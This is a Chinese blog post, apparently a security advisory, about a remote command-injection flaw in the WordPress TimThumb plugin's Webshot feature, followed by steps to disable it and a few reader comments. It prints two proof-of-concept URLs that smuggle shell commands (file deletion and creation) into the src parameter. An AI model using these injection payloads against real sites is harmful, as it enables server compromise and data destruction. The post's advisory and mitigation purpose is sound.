TimThumb Webshots代码漏洞

WordPress31.5K阅读模式

TimThumb WordPress的插件版本2.8.13发现的重大弱点,就在于它的“ Webshot “功能启用时,允许攻击者在远程网站上执行命令。

该漏洞允许攻击者远程受影响的网站上执行任意PHP代码。一旦PHP代码已经被执行,该网站很可能被破坏的攻击者想要的方式。到现在为止,没有任何可用于漏洞补丁。

“ 用一个简单的命令,攻击者可以创建,删除和修改服务器上的任何文件“安全专家说。

使用下面的命令,黑客可以创建,删除和修改服务器上的任何文件:

http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://vulnerablesite.com/$(rm$IFS/tmp/a.txt)

http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=http://vulnerablesite.com/$(touch$IFS/tmp/a.txt)

检查和禁用TIMTHUMB“WEBSHOT”

你的主题或插件目录找到 timthumb.php,搜索“WEBSHOT_ENABLED“

如果发现值为 true 如:('WEBSHOT_ENABLED',true)

请将该值设置为“false“,即('WEBSHOT_ENABLED',false)

本站文章大部分始于原创,用于个人学习记录,可能对您有所帮助,仅供参考!

weinxin
我的微信
版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!
 
知更鸟
评论  3  访客  2  作者  1
    • 明月登楼
      明月登楼 2

      鸟哥,啥时候出个主题专用的timthumb 伪静态呀!

      • Candy Ying
        Candy Ying 2

        https://bugxia.com/455.html timthumb伪静态 本站主题分享 — Bug侠有介绍,不知道能不能实现。
        https://bugxia.com/thumb/400/200/1/85/aHR0cHM6Ly9idWd4aWEuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDIzLzAxLzIwMjMwMTE1MDM0NTQzMjU0LnBuZw==__.jpg

      匿名

      发表评论

      匿名网友
      :?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

      拖动滑块以完成验证